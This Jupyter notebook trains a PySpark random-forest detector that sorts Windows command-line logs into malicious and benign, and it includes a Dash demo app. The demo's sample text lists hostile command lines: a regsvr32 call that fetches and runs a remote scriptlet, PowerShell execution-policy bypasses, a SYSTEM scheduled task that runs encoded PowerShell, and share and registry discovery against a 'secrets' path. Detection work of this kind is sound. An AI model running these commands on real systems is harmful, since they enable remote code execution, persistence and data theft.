In [1]:
from pyspark.conf import SparkConf
from pyspark.sql import SparkSession
import pyspark.sql.functions as F
import pyspark.sql.types as T
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from pyspark.ml import feature, evaluation, Pipeline
from pyspark.ml.classification import RandomForestClassifier
from pyspark.ml.evaluation import BinaryClassificationEvaluator
from pyspark.ml.tuning import CrossValidator, ParamGridBuilder
from functools import reduce
from pyspark.sql import DataFrame
from pyspark.sql import Row

In [2]:
conf = (SparkConf()
            .setAppName('random_forest')
            .setMaster('spark://spark-master:7077')
       )
conf.set("spark.executor.memory", "6g")
conf.set("spark.driver.maxResultSize", "0")
conf.set("spark.sql.shuffle.partitions", "6")
conf.set("spark.default.parallelism", "6")
conf.set("spark.driver.memory", "3g") 

<pyspark.conf.SparkConf at 0x7fcc9d2a9b00>

In [3]:
spark = SparkSession.builder.config(conf=conf).getOrCreate()

In [4]:
# load original dataset without bootstrapped samples
df = (spark.read.format('csv')
      .option('inferSchema', 'true')
      .option('header', 'true')
      .option('escape', '"')
      .load('hdfs://namenode:9000/data/no_bootstrap.csv') 
     )

# Cleaned dataset from previous model
+ regex and split operations transform the string representation of cmd_line_tokens back to an arraytype

In [5]:
df = (df.select('*')
          .withColumn('class_label', df.class_label.cast(T.DoubleType()))
          .withColumn('cmd_line_tokens', F.regexp_replace(F.col('cmd_line_tokens'), r"(\[)|(\]|\'|\s+)", ''))
          .withColumn('cmd_line_tokens', F.split(F.col('cmd_line_tokens'), ','))
     )
df.select('cmd_line_tokens').show(5, False)

+-----------------------------------------------------------------+
|cmd_line_tokens                                                  |
+-----------------------------------------------------------------+
|[svchost.exe, -k, localservicenonetwork, -p]                     |
|[svchost.exe, -k, localservice, -p, -s, dispbrokerdesktopsvc]    |
|[oobe, windeploy.exe]                                            |
|[oobe, setup.exe]                                                |
|[svchost.exe, -k, localservicenetworkrestricted, -p, -s, lmhosts]|
+-----------------------------------------------------------------+
only showing top 5 rows



# Data engineering pipelines 
+ Term Frequency (one-hot): value indicates if feature is present in observation
+ Feature has to be present at least once in dataset and in at least 50 documents

In [6]:
cv_transformer = feature.CountVectorizer(minTF=1, minDF=50, binary=True, inputCol='cmd_line_tokens', outputCol='tf')

In [7]:
estimator = Pipeline(stages=[cv_transformer]).fit(df)

In [8]:
estimator.transform(df).select('cmd_line_tokens','tf').sample(.1).show(5, False)

+--------------------------------------------------------------------------+----------------------------------------------------+
|cmd_line_tokens                                                           |tf                                                  |
+--------------------------------------------------------------------------+----------------------------------------------------+
|[oobe, windeploy.exe]                                                     |(288,[],[])                                         |
|[svchost.exe, -k, localservice, -p, -s, nsi]                              |(288,[26,27,60,63,120],[1.0,1.0,1.0,1.0,1.0])       |
|[svchost.exe, -k, netsvcs, -p, -s, profsvc]                               |(288,[26,27,60,63,77],[1.0,1.0,1.0,1.0,1.0])        |
|[svchost.exe, -k, netsvcs, -p, -s, wlidsvc]                               |(288,[26,27,60,63,77,196],[1.0,1.0,1.0,1.0,1.0,1.0])|
|[program, files, vmware, vmware, tools, vmware, vgauth, vgauthservice.exe]|(288,[2,3,144,

In [9]:
len(estimator.stages[0].vocabulary)

288

In [10]:
training_df, validation_df, testing_df = df.randomSplit([0.6, 0.3, 0.1], seed=0)

In [11]:
rf = RandomForestClassifier(featuresCol='tf', labelCol='class_label', maxDepth=6, numTrees=100, 
                            featureSubsetStrategy='sqrt', impurity='gini', seed=0)
rf_estimator = Pipeline(stages=[cv_transformer, rf])
rf_model = rf_estimator.fit(training_df)

In [12]:
rf_model.transform(testing_df).\
    select(F.avg(F.expr('float(class_label = prediction)')).alias('accuracy')).\
    first()

Row(accuracy=0.9976617303195635)

In [13]:
print(rf_model.stages[-1].trees[1].toDebugString)

DecisionTreeClassificationModel (uid=dtc_5ff797a698c7) of depth 2 with 5 nodes
  If (feature 17 <= 0.5)
   If (feature 115 <= 0.5)
    Predict: 0.0
   Else (feature 115 > 0.5)
    Predict: 1.0
  Else (feature 17 > 0.5)
   Predict: 0.0



# Inference

+ The tokens with the most importance all indicate a malicious log and are very similar to the tokens identified in the LR model

In [14]:
vocab = rf_model.stages[0].vocabulary
feature_importance = rf_model.stages[-1].featureImportances.toArray()
vocab_importance_df = pd.DataFrame({'vocab': vocab, 'weight': feature_importance})
vocab_importance_df.sort_values('weight', ascending=False).head(20)

Unnamed: 0,vocab,weight
115,-executionpolicy,0.312959
116,bypass,0.226809
108,-c,0.149772
161,/c,0.105788
194,select-object,0.104005
195,net,0.029444
15,https,0.019214
6,chrome.exe,0.011493
166,share,0.008869
199,/r,0.00671


# Model Tuning

In [15]:
paramGrid = (ParamGridBuilder() 
                 .addGrid(rf_model.stages[0].minDF, [10, 25, 50]) 
                 .addGrid(rf_model.stages[1].numTrees, [100, 150, 200]) 
                 .addGrid(rf_model.stages[1].maxDepth, [10,15,20,25,30])
                 .build()
            )

In [16]:
models = []
for grid in range(len(paramGrid)):
    print("Fitting model {}".format(grid))
    _model = rf_estimator.fit(validation_df, paramGrid[grid])
    models.append(_model)

Fitting model 0
Fitting model 1
Fitting model 2
Fitting model 3
Fitting model 4
Fitting model 5
Fitting model 6
Fitting model 7
Fitting model 8
Fitting model 9
Fitting model 10
Fitting model 11
Fitting model 12
Fitting model 13
Fitting model 14
Fitting model 15
Fitting model 16
Fitting model 17
Fitting model 18
Fitting model 19
Fitting model 20
Fitting model 21
Fitting model 22
Fitting model 23
Fitting model 24
Fitting model 25
Fitting model 26
Fitting model 27
Fitting model 28
Fitting model 29
Fitting model 30
Fitting model 31
Fitting model 32
Fitting model 33
Fitting model 34
Fitting model 35
Fitting model 36
Fitting model 37
Fitting model 38
Fitting model 39
Fitting model 40
Fitting model 41
Fitting model 42
Fitting model 43
Fitting model 44


In [17]:
evaluator = BinaryClassificationEvaluator(labelCol='class_label', metricName='areaUnderROC')
auc_scores = [evaluator.evaluate(model.transform(validation_df)) for model in models]

In [18]:
auc_scores

[0.9996744156353454,
 0.9996707676312597,
 0.9997191036853961,
 0.9997587757298287,
 0.999776559749747,
 0.9996548076133845,
 0.9996744156353455,
 0.9996999516639459,
 0.999776559749747,
 0.999776559749747,
 0.9996659796258972,
 0.9996707676312597,
 0.9996744156353455,
 0.9997159116818211,
 0.9997765597497469,
 0.9997827157566417,
 0.9997827157566417,
 0.9998173717954564,
 0.9998684438526572,
 0.9998720918567429,
 0.999772227744895,
 0.9997827157566416,
 0.9998397158204817,
 0.9998720918567428,
 0.9998976278853433,
 0.9997827157566417,
 0.9997758757489807,
 0.9997758757489807,
 0.9998397158204817,
 0.9998433638245675,
 0.9939926492717672,
 0.9954641629198625,
 0.9958088993059672,
 0.9958280513274174,
 0.9958280513274174,
 0.9948608742441791,
 0.9958248593238425,
 0.9958248593238425,
 0.9958503953524428,
 0.9958535873560178,
 0.9943246176435717,
 0.9955567310235388,
 0.9958886993953433,
 0.9958886993953433,
 0.9958886993953433]

In [19]:
best_model_idx = np.argmax(auc_scores)
best_model = models[best_model_idx]
print("Best params: \n\n{}\n".format(paramGrid[best_model_idx]))
print("Best AUC: \n\n{}".format(auc_scores[best_model_idx]))

Best params: 

{Param(parent='CountVectorizer_d35c3a2ba888', name='minDF', doc='Specifies the minimum number of different documents a term must appear in to be included in the vocabulary. If this is an integer >= 1, this specifies the number of documents the term must appear in; if this is a double in [0,1), then this specifies the fraction of documents. Default 1.0'): 25.0, Param(parent='RandomForestClassifier_22c1805efeaf', name='numTrees', doc='Number of trees to train (>= 1)'): 150, Param(parent='RandomForestClassifier_22c1805efeaf', name='maxDepth', doc='Maximum depth of the tree. (>= 0) E.g., depth 0 means 1 leaf node; depth 1 means 1 internal node + 2 leaf nodes.'): 30}

Best AUC: 

0.9998976278853433


## Best model
+ minDF: 25
+ numTrees: 150
+ maxDepth: 30

# Cross Validation
+ test best_model performance on training dataset

In [20]:
evaluator.evaluate(best_model.transform(training_df))

0.9996642338885684

# Plotly Dash Code

In [21]:
common_strings = ['windows', 'system32', 'cmd.exe', 'sandcat.exe', 'c', 'windowspowershell', 'powershell.exe', '']

import re
def demo_clean_input(s):
    pattern = re.compile(r"""
        [:|"?']
        | --field-trial-handle=.*\d+
        | //.*com(/.*)/
        | \s*"\s*
        | \{.*\}
        | [=;(),]
        | \\
        | //
        | \s+\.\s+ 
        | $.
        | $_.
    """, re.VERBOSE)
    
    return ','.join([x.lower() for x in re.sub(pattern, ' ', s).split() if x.lower() not in common_strings and len(x) >= 2])

In [22]:
def get_coefs(tokens):
    """ get the coefficient for tokens passed from GUI and returns as string """
    
    _format = "{}: *{}*\n"
    s = ""

    token_coefs = []
    for token in tokens.split(','):
        try:
            weight = round(vocab_importance_df.loc[vocab_importance_df.loc[:, 'vocab'] == token, 'weight'].values[0], 6)
            s += _format.format(token, weight)
        except:
            weight = 0.0  # token is not in vocabulary, therefore return 0 for weight
            s += _format.format(token, weight)   
    return s

# get_coefs('cmd.exe,/c,/t')

In [23]:
def spark_code(s):
    """ tokenizes the input and calls the existing feature and prediction pipelines to transform the input """
    
    # create tokens
    tokens = demo_clean_input(s)
    print(tokens)
    
    # create dataframe
    _schema = T.StructType([
        T.StructField('cmd_line_tokens', T.StringType(), True),
    ])         
    myrow = Row(cmd_line_tokens=tokens, trusted_path=0, process_name="")
    text_df = spark.createDataFrame([myrow], schema=_schema).withColumn('cmd_line_tokens', F.split(F.col('cmd_line_tokens'), r','))
    
    #transform features using existing pipelines
    features = rf_model.transform(text_df)
    
    _features = features.select('cmd_line_tokens').rdd.take(1)[0]['cmd_line_tokens']
    prediction = features.select('prediction').rdd.take(1)[0]['prediction']
    probability = features.select('probability').rdd.take(1)[0]['probability']
    
    coefs = get_coefs(tokens)
    
    result = """
    Tokens: {} \n 
    Probability: {} \n 
    Prediction: {} \n 
    {}
    """
    
    if prediction == 0:
        return result.format(_features, probability, prediction, "*** Benign ***"), coefs
    else:
        return result.format(_features, probability, prediction, "*** Malicious ***"), coefs
                         
# spark_code(r'C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc')
# spark_code(r'"powershell.exe -ExecutionPolicy Bypass -C ""Compress-Archive -Path C:\Users\win10-user3\staged-DestinationPath C:\Users\win10-user3\staged.zip -Force;ls C:\Users\win10-user3\staged.zip | foreach {$_.FullName} | select')

In [24]:
import dash
import dash_table
import dash_core_components as dcc
import dash_html_components as html
from jupyterlab_dash import AppViewer
from dash.dependencies import Input, Output

external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']

viewer = AppViewer()

app = dash.Dash(name=__name__, external_stylesheets=external_stylesheets)

markdown_text = '''
### Windows process command-line classifier (Random Forest)
Please copy and paste your log in the box below
'''

sample_input_data = r'''
### Example malicious logs 
+ C:\Windows\system32\regsvr32.exe" /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
+ powershell.exe -ExecutionPolicy Bypass -C "New-Item -Path \".\" -Name \"staged\" -ItemType \"directory\" -Force | foreach {$_.FullName} | Select-Object"
+ cmd.exe /C "net share"
powershell.exe -ExecutionPolicy Bypass -C "start powershell.exe -ArgumentList \"-NoP\",\"-StA\",\"-ExecutionPolicy\",\"bypass\",\".\Emulate-Administrator-Tasks.ps1\""
### Example benign logs 
+ C:\Windows\system32\dllhost.exe /Processid:{B2FEB3AD-8AE6-42E7-B2E4-60609573B404}
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS 
+ C:\Windows\System32\Upfc.exe /launchtype boot /cv 09o3CnnAskG8AMTNUwkQhQ.0
### Example logs not in dataset
+ cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr "powershell.exe -nop -exec bypass -EncodedCommand $pcode" /sc ONLOGON /RU SYSTEM'
+ cmd.exe /c dir /s /b \\\\FILE001\\secrets
+ C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -nop -exec bypass -EncodedCommand SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQA
+ cmd.exe /c reg query "\\\\\\\\FILE001\\secrets\\hklm\\system\\currentcontrolset\\control\\terminal server
'''

app.layout = html.Div([
    html.Div([
        html.Div([
            dcc.Markdown(children=markdown_text),
            dcc.Textarea(id='input', value='C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc', style={'height': '50px', 'width': '50%'}),
            
        html.Div([html.Button(children='Submit', id='button', n_clicks=0)], style={'margin': '2px'}),
            
        html.Div([
            dcc.Textarea(id='output', value='', style={'height': '175px', 'width': '50%'}),
            dcc.Textarea(id='coefs', value='', style={'height': '175px', 'width': '25%'})
        ]),
            dcc.Markdown(children=sample_input_data)
        ])
    ])
])
    
@app.callback(
    [Output(component_id='output', component_property='value'),  # set output component on reactive change
    Output(component_id='coefs', component_property='value')],
    [Input(component_id='button', component_property='n_clicks')],  #  reactive input comes from button press
    [dash.dependencies.State('input', 'value')]
)
def on_click(n_clicks, value):
    # call pyspark logic from here
    return spark_code(value)
    

viewer.show(app)